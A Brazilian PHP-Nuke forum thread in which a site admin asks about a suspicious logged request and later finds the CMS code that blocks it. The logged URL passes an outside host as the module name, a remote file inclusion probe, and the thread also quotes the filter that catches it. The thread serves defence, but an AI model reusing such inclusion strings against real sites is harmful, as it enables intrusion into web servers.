Ir para o Conteúdo
Comunidade PHP-Nuke Brasil :: Exibir tópico - O que significa isso?
 FAQ   Pesquisar   Grupos   Perfil   Login 

O que significa isso?

 
Novo Tópico   Responder Mensagem    Comunidade PHP-Nuke Brasil - Índice do Fórum -> Segurança no PHP-Nuke
Exibir mensagem anterior :: Exibir próxima mensagem  
Autor Mensagem
Mandrake1
Novato
Novato


Registrado em: Mar 22, 2004
Mensagens: 11

MensagemEnviada: Qui Dez 27, 2007 8:59 am    Assunto: O que significa isso? Responder com Citação

Estava fazendo uma vistoria no meu portal e tive a idéia de usar palavras pornográficas no meu backup, achei na tabela "_nsnst_tracked_ips" do sentinel a seguinte linha
`nome_nsnst_tracked_ips` VALUES (269895, '86.139.124.69', 'host86-139-124-69.range86-139.btcentralplus.com', 1, '', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)', 1196712158, '/modules.php?name=http://hotraebywka.chat.ru/images/girl?', 'none', 'none', '86.139.124.69', '36602', 'GET', '00');

Alguem pode me dizer o que significa o /modules.php?name=http://hotraebywka.chat.ru/images/girl?

o que esse cara está tentando fazer no meu portal? será que tem um script rodando em algum arquivo.

Olhei na pasta modules e não existe nada estranho que justifique o uso do comando http

O pior é que funciona.

Se alguem tiver alguma idéia me avise urgentemente.

Denis
Voltar ao Topo
Ver o perfil de Usuários Enviar Mensagem Particular
jozephh
PHP-Nuke Guru
PHP-Nuke Guru


Registrado em: Jan 18, 2005
Mensagens: 967
Localização: Salvador Bahia

MensagemEnviada: Qui Dez 27, 2007 1:10 pm    Assunto: Ajuda Responder com Citação

Nao sei extamente o que vc quer, porem este link ai provavelmente e da pagina que alguem tava antes de entrar em seu portal, normalmente o link anterior e gravado pra gente saber de onde veio o usuario.
_________________
SO ME ADICIONE NO MSN SE FOR PARA TRABALHO, AJUDO APENAS AKI PELO FORUM.
jozephh@msn.com
Voltar ao Topo
Ver o perfil de Usuários Enviar Mensagem Particular Enviar Email Visitar a homepage do Usuário MSN Messenger
Mandrake1
Novato
Novato


Registrado em: Mar 22, 2004
Mensagens: 11

MensagemEnviada: Qui Dez 27, 2007 6:30 pm    Assunto: Responder com Citação

Na verdade acho que economizei um pouco nas palavras. No Sentinel na opção 'Tracked IP Menu' e posteriormente em 'Display Tracked IP's' vc terá a vida do usuário no seu portal. saberá o ip e onde navegou no seu portal. Neste local achei um ip estranho, juntamente com alguns outros que pude percebe estavam, no histórico, apresentando www.nomedoportal.com.br/modules.php?name=http://hotraebywka.chat.ru/images/girl?
me chamou a atenção a palavra girl. Percebi que aqui era a ação do visitante e não de onde ele veio.

Fui testar o endereço que apareceu escrito "Hi and Bye". Não encontrei nenhuma página dentro do meu portal escrito isso. Fui então testar se funcionava. Quando coloco qualquer outra coisa depois do termo ...name= o portal coloca como "Desculpe-nos, mas este arquivo não foi encontrado." Então fui tentar fazer o teste no site do comunidade e no exato momento fui redirecionado para o site da polícia federal e meu ip foi bloqueado.

A minha dúvida é: Qual o estrago este cara pode ter causado no meu portal? E como fazer com que o meu portal tb apresente este tipo de segurança que é utilizado aqui na comunidade? Por acaso é um Sentinel mais novo, etc?

Espero ter me expressado melhor agora e fica aqui o aviso para quem tb utiliza um nuke 7.5 kayapó.
Voltar ao Topo
Ver o perfil de Usuários Enviar Mensagem Particular
Mandrake1
Novato
Novato


Registrado em: Mar 22, 2004
Mensagens: 11

MensagemEnviada: Sex Dez 28, 2007 6:50 am    Assunto: Responder com Citação

Pessoal queria deixar o meu comunicado. Andei olhando mais no nuke e encontrei nos códigos o seguinte:

if(eregi("http\:\/\/", $name)) { die("Hi and Bye"); }
if(eregi("http\:\/\/", $file)) { die("Hi and Bye"); }

acredito ser uma proteção do nuke para o uso indevido do código. Fiquei mais tranquilo. Para aqueles que são programadores como substituir o código para ao invés de escrever enviar o cara para um outro site e bloquear o ip dele.

Valeu!

Mandrake
Voltar ao Topo
Ver o perfil de Usuários Enviar Mensagem Particular
claudio_luciano
Usuário
Usuário


Registrado em: Jun 02, 2003
Mensagens: 173
Localização: Garanhuns(PE)

MensagemEnviada: Qua Jul 16, 2008 11:31 pm    Assunto: Responder com Citação

Engraçado, pq esse redirecionamento para a PF?? Não entendi. É feito alguma denúncia de tentativa de invasão aqui na CNB?
_________________
Cláudio Luciano
Webmaster e Administrador do Portal Garanhuns Espírita
www.garanhunsespirita.com.br
www.garanhunsespirita.com.br/ceeman
Voltar ao Topo
Ver o perfil de Usuários Enviar Mensagem Particular Visitar a homepage do Usuário MSN Messenger
rjdias
Novato
Novato


Registrado em: Dec 05, 2006
Mensagens: 2
Localização: Brasil

MensagemEnviada: Qui Jul 17, 2008 7:48 pm    Assunto: Responder com Citação

claudio_luciano escreveu:
Engraçado, pq esse redirecionamento para a PF?? Não entendi. É feito alguma denúncia de tentativa de invasão aqui na CNB?

Observe em banco de dados na tabela `nuke_blocked_config` se no registro: `rem_url` não esta o endereço da PF.
Voltar ao Topo
Ver o perfil de Usuários Enviar Mensagem Particular
Mostrar os tópicos anteriores:   
Novo Tópico   Responder Mensagem    Comunidade PHP-Nuke Brasil - Índice do Fórum -> Segurança no PHP-Nuke Todos os horários são GMT - 3 Hours
Página 1 de 1

 
Ir para:  
Enviar Mensagens Novas: Proibido.
Responder Tópicos Proibido
Editar Mensagens: Proibido.
Excluir Mensagens: Proibido.
Votar em Enquetes: Proibido.


Powered by phpBB © 2001-2003 phpBB Group
phpBB port v2.0.7 based on Tom Nitzschner's phpbb2.0.6 upgraded to phpBB 2.0.7 standalone was developed and tested by:
ChatServ, mikem,
and Paul Laudanski (aka Zhen-Xjell).

Version 2.0.7 by Nuke Cops © 2004 http://www.nukecops.com
Forums ©